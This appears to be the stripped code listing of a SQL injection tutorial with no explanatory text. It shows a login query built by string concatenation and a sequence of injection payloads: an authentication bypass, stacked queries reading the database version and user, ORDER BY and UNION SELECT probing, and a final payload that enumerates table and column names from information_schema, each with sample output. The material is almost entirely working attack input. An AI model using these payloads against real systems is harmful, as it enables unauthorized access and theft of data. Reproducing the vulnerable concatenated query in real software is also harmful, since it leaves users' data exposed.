username: ' OR 1 -- -password: <empty> username: ' OR 1;SELECT @@VERSION --

1. username: ' OR 1 -- -
2. password: <empty>
3.  
4. username: ' OR 1;SELECT @@VERSION -- -
5. username: ' OR 1;SELECT user_name -- -
6.  
7. sql = "select id, username from users'
8. + ' where username='" + username + "' and password='" + password +"'";
9.  
10. +----+----------+
11. | id | username |
12. +----+----------+
13. | 42 | jdoe |
14. +----+----------+
15.  
16. +----+----------+
17. | id | username |
18. +----+----------+
19. +----+----------+
20.  
21. select id, username from users where username='' OR 1 --
22.  
23. +----+----------+
24. | id | username |
25. +----+----------+
26. | 42 | jdoe |
27. +----+----------+
28.  
29. username: ' OR 1 ORDER BY 1 -- -
30.  
31. username: ' OR 1 UNION SELECT 1,2 -- -
32.  
33. +----+----------+ +----+----------+
34. | 42 | jdoe | UNION | 1 | 2 |
35. +----+----------+ +----+----------+
36.  
37. +----+----------+
38. | id | username |
39. +----+----------+
40. | 42 | jdoe |
41. +----+----------+
42. | 1 | 2 |
43. +----+----------+
44.  
45. +----+----------+
46. | id | username |
47. +----+----------+
48. | 1 | 2 |
49. +----+----------+
50.  
51. username: ' AND 0 UNION SELECT 1,2 -- -
52.  
53. username: ' AND 0 UNION SELECT 1,@@VERSION -- -
54.  
55. username: ' AND 0 UNION SELECT 1,GROUP_CONCAT(table_name,0x2e,column_name) FROM information_schema.columns WHERE table_schema=database()